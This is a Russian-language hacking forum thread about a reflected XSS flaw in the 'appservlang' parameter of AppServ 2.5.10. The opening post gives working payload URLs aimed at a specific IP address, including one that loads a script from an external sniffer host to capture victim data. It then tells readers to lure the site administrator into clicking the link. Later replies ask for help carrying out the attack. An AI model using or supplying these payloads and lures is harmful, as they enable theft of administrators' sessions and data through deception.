: AppServ 2.5.10, возможно более ранние версии, старая бага Опасность: низкая Источник:
Описание
:
Уязвимость позволяет юзеру провести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "appservlang" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Открытие нового окна:
http://78.108.69.118/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> (открывает phpinfo)
http://78.108.69.118/index.php?appservlang="><INPUT%20TYPE="xss"> (Выводит надпись)
----------------------
Берём онлайн сниффер, я взял от
Далее формируем код: http://78.108.69.118/index.php?appservlang=">
[ Вставлять после "> ]
Код пассивной xss, в моём случае:
http://78.108.69.118/index.php?appservlang=">%3CSCRIPT type=text/javascript src=http://httpz.ru/vj5a0rabojgo.js></SCRIPT>"
Говорим админу что мол на этой страница бага, пожалуйста пройди по сылке, он перейдёт и на ваш сниффер придёт инфа
Счастливо повесилиться!
Последний раз редактировалось Salomey; 04.09.2011 в 17:48.
или у меня чето с оперой, или у тя линки не правильные оО. Проверь, phpinfo не выводит. Ну или версия апп сервера не та)
П.С.
Часть линков вот тут есть
Последний раз редактировалось Cherep; 04.09.2011 в 17:55.
Цитата:
Сообщение от Dr. Cox
а я хз, является-ли мой Samsung GT-S5230 Айфоном..
Извините за флуд, но какую именно информацию выводит?
Да и поподробней, какую ссылку кидать админу? Что-то в этом сниффере от хакер-про для новичка не очень понятно :)
Разъясните поподробней пожалуйста.